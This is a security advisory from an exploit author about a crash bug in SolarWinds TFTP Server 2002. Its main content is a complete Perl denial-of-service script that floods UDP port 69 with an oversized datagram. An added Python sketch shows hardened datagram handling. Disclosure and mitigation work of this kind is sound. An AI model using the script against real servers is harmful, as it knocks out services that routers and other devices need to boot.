#############################################
#Product: TFTP Server 2002 Standard Edition #
#Authors: SolarWinds [www.SolarWinds.net]   #
#Vulnerable versions: v.5.0.55 and below    #
#Vulnerability: buffer overflow             #
#Bug&exploit by D4rkGr3y [www.dhgroup.org]  #
#############################################

#Overview#--------------------------------------------------------------#

From TFTP Server help: "Many network devices require a TFTP Server to load
their initial operating system or configuration. Many routers, switches,
hubs, X-terminals, printers, terminal servers, etc need a TFTP server in
order to load their initial configuration".

#Description#------------------------------------------------------------#

First, TFTP - Trivial File Transfer Protocol. This is not FTP! TFTP and FTP
are different protocols - that's very important! TFTP runs over UDP and
doesn't support some of FTP's features, directory navigation for example.
You can use TFTP for file transfer only. Read RFC 1350 for more details.

#Bug#--------------------------------------------------------------------#

It's possible to crash the TFTP server with a single large UDP datagram
(8193b and above). The vulnerable application on the remote host will be
closed with the error message:

Run-time error '10040':
The datagram is too large to fit into the buffer and is truncated.

#Exploit#----------------------------------------------------------------#

#!/usr/bin/perl
#TFTP Server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "vulnerable_host";
$port = "69";
$data = "q";
$num = "8193";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(Proto => "udp")
 or die "Socket error: $@\n";
$ipaddr = inet_aton($host);
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf)
 or die "Can't send: $!\n";
print "Now, '$host' must be dead :)\n";
#EOF

Best regards
www.dhgroup.org
D4rkGr3y
icq 540981
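
A receive path that survives the oversized datagram described above, as an added example (not SolarWinds' code and not part of the original advisory): it bounds the read, treats error 10040 as a dropped packet instead of a fatal error, and accepts only well-formed RFC 1350 read/write requests. MAX_REQUEST and the function names are assumptions made for this sketch.

```python
import errno
import socket
import struct

MAX_REQUEST = 512      # assumed request size limit for this sketch
WSAEMSGSIZE = 10040    # the Winsock error code quoted in the advisory
OPCODES = {1: "RRQ", 2: "WRQ"}
MODES = ("netascii", "octet", "mail")


def parse_request(datagram: bytes):
    """Return (opcode, filename, mode), or None if the datagram is rejected."""
    if len(datagram) < 4 or len(datagram) > MAX_REQUEST:
        return None
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in OPCODES:
        return None
    # RFC 1350 request body: filename NUL mode NUL (option extensions rejected).
    fields = datagram[2:].split(b"\x00")
    if len(fields) != 3 or fields[2] != b"" or not fields[0]:
        return None
    mode = fields[1].decode("ascii", "replace").lower()
    if mode not in MODES:
        return None
    return OPCODES[opcode], fields[0].decode("ascii", "replace"), mode


def receive_request(sock):
    """Read one datagram; an oversized one is dropped, never fatal."""
    try:
        # Ask for one byte more than the limit so truncation is still
        # detectable on stacks that truncate silently instead of erroring.
        datagram, peer = sock.recvfrom(MAX_REQUEST + 1)
    except OSError as exc:
        too_big = (getattr(exc, "winerror", None) == WSAEMSGSIZE
                   or exc.errno == errno.EMSGSIZE)
        if too_big:
            return None, None   # log and keep serving
        raise
    return parse_request(datagram), peer
```

A server loop would call receive_request() repeatedly and skip any result whose first element is None.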